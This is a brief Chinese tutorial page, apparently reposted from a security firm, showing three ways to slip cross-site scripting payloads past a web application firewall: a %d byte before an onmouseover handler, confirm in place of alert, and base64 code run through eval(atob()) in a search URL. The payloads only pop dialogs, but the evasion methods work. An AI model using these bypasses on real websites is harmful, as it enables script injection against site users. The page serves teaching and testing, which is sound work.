来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 实例1,WAF Filter: onmouseoverinput type=text name=firstname value=Anna onmouseover=alert(lsquo;XSS within input fieldrsquo;) ByPass: %dinput type=text name=firstname value=Ann...
|
实例1,
WAF Filter: ”onmouseover” <input type=text name=firstname value=”Anna” onmouseover=alert(‘XSS within input field’) “> ByPass: %d <input type=text name=firstname value=”Anna”%donmouseover=alert(‘XSS within input field’) “>
实例2,WAF检测alert,因为很多自动检测工具用到这语句来测试XSS
“ onmouseover=alert(‘XSS within input field’) or <input type=text name=firstname value=”Anna” onmouseover=alert(‘XSS within input field’) “> WAF keyword Filter:alert (some test tools use 'alert')
Bypass:
1,use confirm as the payload instead of “alert”
实例3,
Encode to byPass Filter :“eval(atob(“encryptedcontent”))” /*“Y29uZmlybSgxKTs=” is base 64 encoded “confirm(1);”*/ URL:http://somesite.com/search?searchterm=%27);eval(atob(“Y29uZmlybSgxKTs=”));// Source: <script> ... var foo = escape(‘’);eval(atob(“Y29uZmlybSgxKTs=”));//’); ... </script>
参考:http://www.netspi.com
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
